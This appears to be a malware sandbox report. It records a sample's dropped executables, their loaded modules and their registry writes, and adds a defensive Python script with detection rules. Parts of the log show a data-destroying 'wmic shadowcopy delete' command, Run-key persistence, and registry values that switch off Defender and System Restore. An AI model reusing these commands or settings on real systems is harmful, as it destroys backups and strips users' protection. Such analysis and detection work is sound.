c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\apphelp.dll
c:\users\admin\4950606094303050\wincfg32svc.exe

PID
2928
CMD
C:\Users\admin\657607470096780\winsvcs.exe
Path
C:\Users\admin\657607470096780\winsvcs.exe
Indicators
Parent process
2746537711.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\657607470096780\winsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\1958842343.exe
c:\users\admin\appdata\local\temp\3088011411.exe

PID
3568
CMD
C:\Users\admin\4950606094303050\wincfg32svc.exe
Path
C:\Users\admin\4950606094303050\wincfg32svc.exe
Indicators
Parent process
3875839546.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\4950606094303050\wincfg32svc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\wshtcpip.dll

PID
2180
CMD
C:\Users\admin\AppData\Local\Temp\3468116065.exe
Path
C:\Users\admin\AppData\Local\Temp\3468116065.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3468116065.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll

PID
2160
CMD
C:\Users\admin\AppData\Local\Temp\1958842343.exe
Path
C:\Users\admin\AppData\Local\Temp\1958842343.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\1958842343.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll

PID
2124
CMD
C:\Users\admin\AppData\Local\Temp\3088011411.exe
Path
C:\Users\admin\AppData\Local\Temp\3088011411.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3088011411.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll

PID
3940
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
No indicators
Parent process
3468116065.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147749908 (0x80041014, WBEM_E_INITIALIZATION_FAILURE: the shadow copy deletion attempt failed in this run)
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll

PID
3828
CMD
C:\Users\admin\AppData\Local\Temp\3358028963.exe
Path
C:\Users\admin\AppData\Local\Temp\3358028963.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3358028963.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll

PID
3124
CMD
C:\Users\admin\AppData\Local\Temp\3782739527.exe
Path
C:\Users\admin\AppData\Local\Temp\3782739527.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3782739527.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\profapi.dll
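
The process blocks above are raw records; what an analyst reads out of them is a handful of patterns: a digits-only executable under %TEMP% started by winsvcs.exe, a service-like binary in a digits-only folder directly under the user profile, a user-profile executable with no version resource, and wmic.exe launched with `shadowcopy delete` by one of the drops. The following is an added example, not ANY.RUN's code, that encodes those patterns as rules and runs them over the records copied from this report; the rule names, the regexes and the finding labels are this example's own choices, and the exit-code helper shows why 2147749908 should be read as the HRESULT 0x80041014 rather than as a count.

```python
"""Triage rules over the process tree recorded above (added example, not ANY.RUN code)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Proc:
    pid: int
    cmd: str
    path: str
    parent: str                      # the report names the parent by image only
    exit_code: Optional[int] = None  # None: no exit code recorded in the report
    company: str = ""                # empty: no version resource in the binary


# Constructed list; every value is copied from the process blocks in the report.
PROCS = [
    Proc(3568, r"C:\Users\admin\4950606094303050\wincfg32svc.exe",
         r"C:\Users\admin\4950606094303050\wincfg32svc.exe", "3875839546.exe"),
    Proc(2180, r"C:\Users\admin\AppData\Local\Temp\3468116065.exe",
         r"C:\Users\admin\AppData\Local\Temp\3468116065.exe", "winsvcs.exe"),
    Proc(2160, r"C:\Users\admin\AppData\Local\Temp\1958842343.exe",
         r"C:\Users\admin\AppData\Local\Temp\1958842343.exe", "winsvcs.exe", 0),
    Proc(2124, r"C:\Users\admin\AppData\Local\Temp\3088011411.exe",
         r"C:\Users\admin\AppData\Local\Temp\3088011411.exe", "winsvcs.exe", 0),
    Proc(3940, r'"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete',
         r"C:\Windows\system32\wbem\wmic.exe", "3468116065.exe", 2147749908,
         "Microsoft Corporation"),
    Proc(3828, r"C:\Users\admin\AppData\Local\Temp\3358028963.exe",
         r"C:\Users\admin\AppData\Local\Temp\3358028963.exe", "winsvcs.exe", 0),
    Proc(3124, r"C:\Users\admin\AppData\Local\Temp\3782739527.exe",
         r"C:\Users\admin\AppData\Local\Temp\3782739527.exe", "winsvcs.exe", 0),
]

# Digits-only image name under %TEMP%, e.g. ...\Temp\3468116065.exe
NUMERIC_TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\\d+\.exe$", re.IGNORECASE)
# Binary in a digits-only folder directly under the profile, e.g. C:\Users\admin\4950606094303050\wincfg32svc.exe
NUMERIC_PROFILE_DIR = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\\d+\\[^\\]+\.exe$", re.IGNORECASE)
# Shadow copy deletion through either of the two built-in tools usually abused for it
SHADOW_DELETE = re.compile(r"(wmic.*shadowcopy\s+delete|vssadmin.*delete\s+shadows)", re.IGNORECASE)


def hresult(code: int) -> str:
    """Show an exit code as the 32-bit HRESULT it is: 2147749908 -> '0x80041014'."""
    return f"0x{code & 0xFFFFFFFF:08X}"


def triage(procs: List[Proc]) -> List[Tuple[int, str, str]]:
    """Return (pid, tactic, detail) findings; an empty list means nothing matched."""
    findings: List[Tuple[int, str, str]] = []
    for p in procs:
        if SHADOW_DELETE.search(p.cmd):
            if p.exit_code is None:
                status = "exit status not recorded"
            elif p.exit_code == 0:
                status = "succeeded"
            else:
                status = f"failed with {hresult(p.exit_code)}"
            findings.append((p.pid, "impact", f"shadow copy deletion launched by {p.parent}; {status}"))
        if NUMERIC_TEMP_EXE.search(p.path):
            findings.append((p.pid, "execution", f"numerically named executable run from %TEMP% by {p.parent}"))
        if NUMERIC_PROFILE_DIR.match(p.path):
            findings.append((p.pid, "persistence", "service-like binary in a numeric folder directly under the user profile"))
        if not p.company and p.path.lower().startswith("c:\\users\\"):
            findings.append((p.pid, "indicator", "user-profile executable without a version resource"))
    return findings


if __name__ == "__main__":
    for pid, tactic, detail in triage(PROCS):
        print(f"{pid:>5}  {tactic:<11} {detail}")
```

Run as a script it prints thirteen findings for the seven records. The wmic.exe record is the one to read carefully: 0x80041014 is a WMI error (WBEM_E_INITIALIZATION_FAILURE), so the deletion did not go through in this sandbox run, but the attempt is the indicator and a non-zero exit should be reported as "failed this time", never as benign.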

Registry activity

Total events
1289
Read events
1116
Write events
171
Delete events
2

Modification events

PID | Process | Operation | Key | Name | Value
3676 | 3875839546.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | WinCfgMgr | C:\Users\admin\4950606094303050\wincfg32svc.exe
3676 | 3875839546.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | WinCfgMgr | C:\Users\admin\4950606094303050\wincfg32svc.exe
2884 | WScript.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
2884 | WScript.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
3784 | powershell.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E | LanguageList | en-US
3784 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | 0
3784 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | 0
3784 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | 4294901760
3784 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | 4294901760
3784 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | 1048576
3784 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | %windir%\tracing
3784 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | 0
3784 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | 0
3784 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | 4294901760
3784 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | 4294901760
3784 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize | 1048576
3784 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory | %windir%\tracing
3784 | powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
3784 | powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
3844 | 979574639568794.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | Microsoft Windows Services | C:\Users\admin\495030305060\winsvcs.exe
2648 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32 | EnableFileTracing | 0
2648 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32 | EnableConsoleTracing | 0
2648 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32 | FileTracingMask | 4294901760
2648 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32 | ConsoleTracingMask | 4294901760
2648 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32 | MaxFileSize | 1048576
2648 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32 | FileDirectory | %windir%\tracing
2648 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS | EnableFileTracing | 0
2648 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS | EnableConsoleTracing | 0
2648 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS | FileTracingMask | 4294901760
2648 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS | ConsoleTracingMask | 4294901760
2648 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS | MaxFileSize | 1048576
2648 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS | FileDirectory | %windir%\tracing
2648 | winsvcs.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable | 0
2648 | winsvcs.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | (value elided)
2648 | winsvcs.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
2648 | winsvcs.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtBMP |
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtIcon |
2820 | WinRAR.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E | LanguageList | en-US
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | 0 | C:\Users\admin\AppData\Local\Temp\Love_You_2019_33235120-txt.zip
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | name | 120
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | size | 80
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | type | 120
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | mtime | 100
2820 | WinRAR.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E | @C:\Windows\System32\wshext.dll,-4804 | JScript Script File
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin | Placement | 2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\General | LastFolder | C:\Users\admin\AppData\Local\Temp
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths | name | 120
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths | size | 80
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths | psize | 80
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths | type | 120
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths | mtime | 100
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths | crc | 70
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout | Band56_0 | 38000000730100000402000000000000D4D0C800000000000000000000000000320101000000000039000000B40200000000000001000000
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout | Band56_1 | 38000000730100000500000000000000D4D0C8000000000000000000000000003401010000000000160000002A0000000000000002000000
2820 | WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout | Band56_2 | 38000000730100000400000000000000D4D0C8000000000000000000000000001C0102000000000016000000640000000000000003000000
3736 | 2746537711.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Microsoft Windows Services | C:\Users\admin\657607470096780\winsvcs.exe
3736 | 2746537711.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | Microsoft Windows Services | C:\Users\admin\657607470096780\winsvcs.exe
2928 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | DisableScanOnRealtimeEnable | 1
2928 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | DisableOnAccessProtection | 1
2928 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | DisableBehaviorMonitoring | 1
2928 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center | AntiVirusOverride | 1
2928 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center | UpdatesOverride | 1
2928 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center | FirewallOverride | 1
2928 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center | AntiVirusDisableNotify | 1
2928 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center | UpdatesDisableNotify | 1
2928 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center | AutoUpdateDisableNotify | 1
2928 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center | FirewallDisableNotify | 1
2928 | winsvcs.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore | DisableSR | 1
2928 | winsvcs.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable | 0
2928 | winsvcs.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | (value elided)
2928 | winsvcs.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
2928 | winsvcs.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\ex_data\data | ext | 2E007A0068007300710076007A000000
